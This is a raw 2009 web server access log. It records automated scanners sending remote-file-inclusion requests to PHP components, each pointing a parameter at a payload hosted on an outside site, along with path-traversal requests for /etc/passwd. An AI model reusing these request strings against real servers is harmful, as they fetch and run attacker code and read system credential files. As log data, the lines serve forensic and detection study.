70.85.165.10 - - [08/Jun/2009:03:17:41 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:17:41 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:17:41 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:17:42 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:17:42 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:17:44 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:17:44 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:17:44 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:03:17:47 -0400] "GET /logs/access_log.Q109052800//skins/zero_vote/login.php?dir=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:17:51 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:17:52 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:17:52 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:17:57 -0400] "GET /logs/access_log.Q109053100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:17:59 -0400] "GET /logs/access_log.Q109053100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:18:10 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:03:18:17 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:03:18:17 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:03:18:17 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:18:18 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.49.99.7 - - [08/Jun/2009:03:18:25 -0400] "GET /logs/access_log.Q109052900/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
122.153.212.195 - - [08/Jun/2009:03:19:05 -0400] "GET /logs/access_log.Q109050300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:03:19:05 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:03:19:06 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
58.177.251.221 - - [08/Jun/2009:03:19:23 -0400] "GET /logs/access_log.Q109053000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
61.250.85.200 - - [08/Jun/2009:03:19:43 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:03:20:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.177.251.221 - - [08/Jun/2009:03:20:27 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:03:20:27 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:03:20:28 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
122.201.76.100 - - [08/Jun/2009:03:20:49 -0400] "GET /logs/error_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:20:50 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:20:50 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:20:50 -0400] "GET /logs/error_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:20:51 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:20:51 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:03:21:04 -0400] "GET /logs/error_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:03:21:04 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:03:21:05 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
122.201.76.100 - - [08/Jun/2009:03:21:10 -0400] "GET /logs/access_log.Q109053000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:21:11 -0400] "GET /logs/access_log.Q109053000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:21:44 -0400] "GET /logs/error_log.Q108051400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:21:57 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:03:22:09 -0400] "GET /logs/error_log.Q108051400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:03:22:14 -0400] "GET /logs/error_log.Q109052000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
217.169.210.130 - - [08/Jun/2009:03:22:19 -0400] "GET /logs/access_log.Q109052300//?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.76"
70.85.165.10 - - [08/Jun/2009:03:22:20 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:22:20 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.169.210.130 - - [08/Jun/2009:03:22:24 -0400] "GET //?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.76"
217.169.210.130 - - [08/Jun/2009:03:22:24 -0400] "GET /logs//?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 4639 "-" "libwww-perl/5.76"
77.221.152.82 - - [08/Jun/2009:03:22:31 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:03:22:31 -0400] "GET /?sourcedir=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:03:22:31 -0400] "GET /logs/?sourcedir=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 200 4634 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:03:22:38 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
122.201.76.100 - - [08/Jun/2009:03:23:12 -0400] "GET /logs/error_log.Q109052000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:23:12 -0400] "GET /logs/error_log.Q109052000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:23:51 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
70.85.165.10 - - [08/Jun/2009:03:23:51 -0400] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:23:51 -0400] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:23:52 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:03:23:52 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:23:52 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:23:56 -0400] "GET /logs/error_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:23:56 -0400] "GET /logs/error_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:24:04 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:24:05 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:24:05 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:03:24:19 -0400] "GET /logs/error_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
70.85.165.10 - - [08/Jun/2009:03:24:19 -0400] "GET /logs/access_log.Q109050700%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.153.212.195 - - [08/Jun/2009:03:24:19 -0400] "GET /logs/error_log.Q108051400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:03:24:27 -0400] "GET /logs/access_log.Q109053000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
209.59.12.99 - - [08/Jun/2009:03:25:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.152.82 - - [08/Jun/2009:03:25:34 -0400] "GET /logs/error_log.Q108052600%20/?sourcedir=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
124.0.73.2 - - [08/Jun/2009:03:25:43 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.73.2 - - [08/Jun/2009:03:25:43 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.0.73.2 - - [08/Jun/2009:03:25:43 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.73.2 - - [08/Jun/2009:03:25:43 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:03:26:18 -0400] "GET /logs/access_log.Q109051100/index.php?cutepath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:03:26:18 -0400] "GET /logs/index.php?cutepath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:03:26:18 -0400] "GET /index.php?cutepath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
190.144.44.36 - - [08/Jun/2009:03:26:46 -0400] "GET /logs/access_log.Q109051100/index.php?cutepath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
190.144.44.36 - - [08/Jun/2009:03:26:46 -0400] "GET /logs/index.php?cutepath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
190.144.44.36 - - [08/Jun/2009:03:26:46 -0400] "GET /index.php?cutepath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
77.221.130.2 - - [08/Jun/2009:03:26:48 -0400] "GET /logs/error_log.Q109042900/index.php?cutepath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
122.153.212.195 - - [08/Jun/2009:03:26:52 -0400] "GET /logs/error_log.Q109052000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
190.144.44.36 - - [08/Jun/2009:03:27:20 -0400] "GET /logs/error_log.Q109042900/index.php?cutepath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
70.32.106.32 - - [08/Jun/2009:03:27:55 -0400] "GET //skin/zero_vote/setup.php?dir=http://www.finatech.jp/hp/tmp/fck.txt????? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
70.32.106.32 - - [08/Jun/2009:03:27:55 -0400] "GET /logs/error_log.Q109051200//skin/zero_vote/setup.php?dir=http://www.finatech.jp/hp/tmp/fck.txt????? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
70.32.106.32 - - [08/Jun/2009:03:27:55 -0400] "GET /logs//skin/zero_vote/setup.php?dir=http://www.finatech.jp/hp/tmp/fck.txt????? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
64.72.150.123 - - [08/Jun/2009:03:28:03 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.72.150.123 - - [08/Jun/2009:03:28:03 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.72.150.123 - - [08/Jun/2009:03:28:03 -0400] "GET /logs/access_log.Q108052700//modules/4nAlbum/public/displayCategory.php?basepath=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
70.32.106.32 - - [08/Jun/2009:03:28:06 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/setup.php?dir=http://www.finatech.jp/hp/tmp/fck.txt????? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
64.72.150.123 - - [08/Jun/2009:03:30:03 -0400] "GET /logs/access_log.Q108052700%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
64.72.150.123 - - [08/Jun/2009:03:30:09 -0400] "GET /logs/access_log.Q109052200%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
80.67.20.178 - - [08/Jun/2009:03:30:48 -0400] "GET //index.php?stranica=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
80.67.20.178 - - [08/Jun/2009:03:30:48 -0400] "GET /logs//index.php?stranica=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
80.67.20.178 - - [08/Jun/2009:03:30:48 -0400] "GET /logs/access_log.Q109051600//index.php?stranica=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.212.195 - - [08/Jun/2009:03:31:13 -0400] "GET /logs/error_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:03:31:14 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:03:31:14 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
209.59.12.99 - - [08/Jun/2009:03:31:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.152.82 - - [08/Jun/2009:03:31:54 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:03:31:54 -0400] "GET /errors.php?error=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:03:31:54 -0400] "GET /logs/errors.php?error=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:03:32:06 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
122.153.212.195 - - [08/Jun/2009:03:32:08 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:03:32:08 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:03:32:09 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
212.150.52.114 - - [08/Jun/2009:03:32:26 -0400] "GET /logs/access_log.Q108052700//modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
212.150.52.114 - - [08/Jun/2009:03:32:26 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
212.150.52.114 - - [08/Jun/2009:03:32:27 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
212.150.52.114 - - [08/Jun/2009:03:32:38 -0400] "GET /logs/access_log.Q109052200//modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
217.147.29.190 - - [08/Jun/2009:03:32:53 -0400] "GET /logs/access_log.Q109052100%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
80.67.20.178 - - [08/Jun/2009:03:34:09 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
80.67.20.178 - - [08/Jun/2009:03:34:09 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
122.153.212.195 - - [08/Jun/2009:03:34:41 -0400] "GET /logs/error_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
80.67.20.178 - - [08/Jun/2009:03:34:45 -0400] "GET /logs/access_log.Q109051700%20%20/e404.php?DOCUMENT_ROOT=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:36:05 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:36:05 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:36:05 -0400] "GET /logs/access_log.Q108062200//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:36:09 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:36:09 -0400] "GET /logs/access_log.Q108062200//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:36:09 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:36:11 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:36:19 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
